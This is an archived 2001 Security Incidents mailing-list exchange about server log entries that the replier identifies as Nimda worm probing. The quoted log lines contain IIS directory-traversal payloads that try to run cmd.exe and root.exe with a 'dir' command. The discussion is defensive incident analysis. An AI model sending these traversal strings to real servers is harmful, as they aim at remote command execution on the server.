Security Incidents mailing list archives
Re: code red request, but cant be resolved?
From: Mike Shaw <mshaw () wwisp com>
Date: Thu, 25 Oct 2001 16:26:40 -0500
It has a reverse lookup (64.148.216.72) but no forward lookup. That IP block is indeed owned by Internetconnect.
Looks like simple Nimdaness to me. -Mike At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:
Hi, I just got this. Is it just me, or is this address spoofed? Can anyone resolve dsl-6414821672.internetconnect.net?dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"-- Emre Yildirim <emre () asper org> GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- code red request, but cant be resolved? Emre Yildirim (Oct 25)
- Re: code red request, but cant be resolved? Mike Shaw (Oct 25)
- TCP FIN Increase Sam Brothers (Oct 25)
- Re: TCP FIN Increase Skip Carter (Oct 25)
- Re: code red request, but cant be resolved? John Oliver (Oct 25)